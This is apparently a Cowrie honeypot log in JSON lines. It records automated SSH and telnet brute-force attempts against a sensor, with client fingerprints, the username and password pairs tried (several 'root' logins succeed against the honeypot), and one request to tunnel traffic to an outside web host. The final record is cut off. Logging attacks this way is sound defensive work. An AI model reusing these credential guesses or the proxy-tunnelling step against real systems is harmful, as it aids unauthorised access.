{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T00:26:53.382328Z","src_ip":"212.227.235.229","session":"799d8106e29b"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T00:26:54.637501Z","src_ip":"212.227.235.229","session":"799d8106e29b"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:26:54.942464Z","src_ip":"212.227.235.229","session":"799d8106e29b"}
{"eventid":"cowrie.session.closed","duration":"9.9","message":"Connection lost after 9.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:26:54.943420Z","src_ip":"212.227.235.229","session":"63573db66a1b"}
{"eventid":"cowrie.session.closed","duration":12.75930404663086,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:27:04.759121Z","src_ip":"212.227.235.229","session":"3e3763579d67"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":1771,"dst_ip":"1.2.3.4","dst_port":23,"session":"d359f682ec2c","protocol":"telnet","message":"New connection: 212.227.235.229:1771 (1.2.3.4:23) [session: d359f682ec2c]","sensor":"my-vps","timestamp":"2025-08-31T00:27:04.920579Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55982,"dst_ip":"1.2.3.4","dst_port":22,"session":"93b6a7c7261b","protocol":"ssh","message":"New connection: 212.227.235.229:55982 (1.2.3.4:22) [session: 93b6a7c7261b]","sensor":"my-vps","timestamp":"2025-08-31T00:27:10.616681Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:27:10.617817Z","src_ip":"212.227.235.229","session":"93b6a7c7261b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56290,"dst_ip":"1.2.3.4","dst_port":22,"session":"47e335b5344f","protocol":"ssh","message":"New connection: 212.227.235.229:56290 (1.2.3.4:22) [session: 47e335b5344f]","sensor":"my-vps","timestamp":"2025-08-31T00:27:10.755408Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:27:10.756347Z","src_ip":"212.227.235.229","session":"47e335b5344f"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-08-31T00:27:10.893219Z","src_ip":"212.227.235.229","session":"47e335b5344f"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-08-31T00:27:11.305675Z","src_ip":"212.227.235.229","session":"47e335b5344f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-08-31T00:27:11.443781Z","session":"47e335b5344f"}
{"eventid":"cowrie.session.closed","duration":12.928229093551636,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:27:17.848744Z","src_ip":"212.227.235.229","session":"d359f682ec2c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":1838,"dst_ip":"1.2.3.4","dst_port":23,"session":"fa054b3c2925","protocol":"telnet","message":"New connection: 212.227.235.229:1838 (1.2.3.4:23) [session: fa054b3c2925]","sensor":"my-vps","timestamp":"2025-08-31T00:27:18.010186Z"}
{"eventid":"cowrie.session.closed","duration":12.768876314163208,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:27:30.778991Z","src_ip":"212.227.235.229","session":"fa054b3c2925"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":1717,"dst_ip":"1.2.3.4","dst_port":23,"session":"14ce66ebf4be","protocol":"telnet","message":"New connection: 212.227.235.229:1717 (1.2.3.4:23) [session: 14ce66ebf4be]","sensor":"my-vps","timestamp":"2025-08-31T00:27:30.940842Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38100,"dst_ip":"1.2.3.4","dst_port":22,"session":"bb70410445ce","protocol":"ssh","message":"New connection: 212.227.235.229:38100 (1.2.3.4:22) [session: bb70410445ce]","sensor":"my-vps","timestamp":"2025-08-31T00:27:31.776151Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:27:32.886151Z","src_ip":"212.227.235.229","session":"bb70410445ce"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T00:27:32.886972Z","src_ip":"212.227.235.229","session":"bb70410445ce"}
{"eventid":"cowrie.login.failed","username":"backup","password":"123456","message":"login attempt [backup/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T00:27:34.222725Z","src_ip":"212.227.235.229","session":"bb70410445ce"}
{"eventid":"cowrie.session.closed","duration":"3.9","message":"Connection lost after 3.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:27:35.635619Z","src_ip":"212.227.235.229","session":"bb70410445ce"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":64168,"dst_ip":"1.2.3.4","dst_port":22,"session":"61999caab241","protocol":"ssh","message":"New connection: 217.72.205.35:64168 (1.2.3.4:22) [session: 61999caab241]","sensor":"my-vps","timestamp":"2025-08-31T00:27:42.533762Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:27:42.534948Z","src_ip":"217.72.205.35","session":"61999caab241"}
{"eventid":"cowrie.session.closed","duration":12.957317590713501,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:27:43.898062Z","src_ip":"212.227.235.229","session":"14ce66ebf4be"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":3899,"dst_ip":"1.2.3.4","dst_port":23,"session":"be14bfd2b6d3","protocol":"telnet","message":"New connection: 212.227.235.229:3899 (1.2.3.4:23) [session: be14bfd2b6d3]","sensor":"my-vps","timestamp":"2025-08-31T00:27:44.058281Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56738,"dst_ip":"1.2.3.4","dst_port":22,"session":"c8e4ac1ab150","protocol":"ssh","message":"New connection: 212.227.235.229:56738 (1.2.3.4:22) [session: c8e4ac1ab150]","sensor":"my-vps","timestamp":"2025-08-31T00:27:44.488907Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T00:27:44.489638Z","src_ip":"212.227.235.229","session":"c8e4ac1ab150"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T00:27:44.794439Z","src_ip":"212.227.235.229","session":"c8e4ac1ab150"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":62783,"dst_ip":"1.2.3.4","dst_port":22,"session":"05de6eeade39","protocol":"ssh","message":"New connection: 212.227.235.229:62783 (1.2.3.4:22) [session: 05de6eeade39]","sensor":"my-vps","timestamp":"2025-08-31T00:27:45.930045Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:27:45.931162Z","src_ip":"212.227.235.229","session":"05de6eeade39"}
{"eventid":"cowrie.login.failed","username":"glassfish1","password":"glassfish1","message":"login attempt [glassfish1/glassfish1] failed","sensor":"my-vps","timestamp":"2025-08-31T00:27:46.050174Z","src_ip":"212.227.235.229","session":"c8e4ac1ab150"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":32385,"dst_ip":"1.2.3.4","dst_port":22,"session":"d3e6fdb1aaad","protocol":"ssh","message":"New connection: 212.227.235.229:32385 (1.2.3.4:22) [session: d3e6fdb1aaad]","sensor":"my-vps","timestamp":"2025-08-31T00:27:46.248280Z"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:27:46.335323Z","src_ip":"212.227.235.229","session":"d3e6fdb1aaad"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54224,"dst_ip":"1.2.3.4","dst_port":22,"session":"b01fea3d703c","protocol":"ssh","message":"New connection: 212.227.235.229:54224 (1.2.3.4:22) [session: b01fea3d703c]","sensor":"my-vps","timestamp":"2025-08-31T00:27:46.542259Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:27:46.543137Z","src_ip":"212.227.235.229","session":"b01fea3d703c"}
{"eventid":"cowrie.client.kex","hassh":"2aec6b44b06bec95d73f66b5d30cb69a","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2aec6b44b06bec95d73f66b5d30cb69a","sensor":"my-vps","timestamp":"2025-08-31T00:27:46.629668Z","src_ip":"212.227.235.229","session":"b01fea3d703c"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:27:47.355911Z","src_ip":"212.227.235.229","session":"c8e4ac1ab150"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47894,"dst_ip":"1.2.3.4","dst_port":23,"session":"0f9c341d1b6d","protocol":"telnet","message":"New connection: 212.227.235.229:47894 (1.2.3.4:23) [session: 0f9c341d1b6d]","sensor":"my-vps","timestamp":"2025-08-31T00:27:54.127839Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57288,"dst_ip":"1.2.3.4","dst_port":22,"session":"1ac3f62c169b","protocol":"ssh","message":"New connection: 212.227.125.160:57288 (1.2.3.4:22) [session: 1ac3f62c169b]","sensor":"my-vps","timestamp":"2025-08-31T00:27:54.796652Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:27:55.454446Z","src_ip":"212.227.125.160","session":"1ac3f62c169b"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T00:27:55.502154Z","src_ip":"212.227.125.160","session":"1ac3f62c169b"}
{"eventid":"cowrie.session.closed","duration":12.699620485305786,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:27:56.757833Z","src_ip":"212.227.235.229","session":"be14bfd2b6d3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":3262,"dst_ip":"1.2.3.4","dst_port":23,"session":"9db59ce3bf45","protocol":"telnet","message":"New connection: 212.227.235.229:3262 (1.2.3.4:23) [session: 9db59ce3bf45]","sensor":"my-vps","timestamp":"2025-08-31T00:27:56.917793Z"}
{"eventid":"cowrie.login.failed","username":"backup","password":"123456","message":"login attempt [backup/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T00:27:58.000022Z","src_ip":"212.227.125.160","session":"1ac3f62c169b"}
{"eventid":"cowrie.session.closed","duration":"4.7","message":"Connection lost after 4.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:27:59.524321Z","src_ip":"212.227.125.160","session":"1ac3f62c169b"}
{"eventid":"cowrie.session.closed","duration":"20.0","message":"Connection lost after 20.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:28:06.543051Z","src_ip":"212.227.235.229","session":"b01fea3d703c"}
{"eventid":"cowrie.session.closed","duration":13.029239654541016,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:28:09.946954Z","src_ip":"212.227.235.229","session":"9db59ce3bf45"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":3124,"dst_ip":"1.2.3.4","dst_port":23,"session":"cf6626d20214","protocol":"telnet","message":"New connection: 212.227.235.229:3124 (1.2.3.4:23) [session: cf6626d20214]","sensor":"my-vps","timestamp":"2025-08-31T00:28:10.111296Z"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:28:20.756101Z","src_ip":"212.227.235.229","session":"47e335b5344f"}
{"eventid":"cowrie.session.closed","duration":12.677649736404419,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:28:22.788881Z","src_ip":"212.227.235.229","session":"cf6626d20214"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":3092,"dst_ip":"1.2.3.4","dst_port":23,"session":"75f90290eebd","protocol":"telnet","message":"New connection: 212.227.235.229:3092 (1.2.3.4:23) [session: 75f90290eebd]","sensor":"my-vps","timestamp":"2025-08-31T00:28:22.951535Z"}
{"eventid":"cowrie.session.closed","duration":31.497986793518066,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:28:25.625750Z","src_ip":"212.227.235.229","session":"0f9c341d1b6d"}
{"eventid":"cowrie.session.closed","duration":12.877622365951538,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:28:35.829068Z","src_ip":"212.227.235.229","session":"75f90290eebd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":3964,"dst_ip":"1.2.3.4","dst_port":23,"session":"95a2c9b2b8fc","protocol":"telnet","message":"New connection: 212.227.235.229:3964 (1.2.3.4:23) [session: 95a2c9b2b8fc]","sensor":"my-vps","timestamp":"2025-08-31T00:28:35.989169Z"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:28:38.334563Z","src_ip":"212.227.235.229","session":"da7161736ac9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50418,"dst_ip":"1.2.3.4","dst_port":22,"session":"77bd2442c647","protocol":"ssh","message":"New connection: 212.227.235.229:50418 (1.2.3.4:22) [session: 77bd2442c647]","sensor":"my-vps","timestamp":"2025-08-31T00:28:40.691363Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:28:42.670154Z","src_ip":"212.227.235.229","session":"77bd2442c647"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T00:28:42.671192Z","src_ip":"212.227.235.229","session":"77bd2442c647"}
{"eventid":"cowrie.login.failed","username":"backup","password":"12345","message":"login attempt [backup/12345] failed","sensor":"my-vps","timestamp":"2025-08-31T00:28:45.783140Z","src_ip":"212.227.235.229","session":"77bd2442c647"}
{"eventid":"cowrie.session.closed","duration":"6.9","message":"Connection lost after 6.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:28:47.578496Z","src_ip":"212.227.235.229","session":"77bd2442c647"}
{"eventid":"cowrie.session.closed","duration":12.908534526824951,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:28:48.897629Z","src_ip":"212.227.235.229","session":"95a2c9b2b8fc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":3255,"dst_ip":"1.2.3.4","dst_port":23,"session":"47bc961788d2","protocol":"telnet","message":"New connection: 212.227.235.229:3255 (1.2.3.4:23) [session: 47bc961788d2]","sensor":"my-vps","timestamp":"2025-08-31T00:28:49.057995Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50584,"dst_ip":"1.2.3.4","dst_port":22,"session":"e948997c0225","protocol":"ssh","message":"New connection: 212.227.235.229:50584 (1.2.3.4:22) [session: e948997c0225]","sensor":"my-vps","timestamp":"2025-08-31T00:28:52.235728Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T00:28:52.236404Z","src_ip":"212.227.235.229","session":"e948997c0225"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 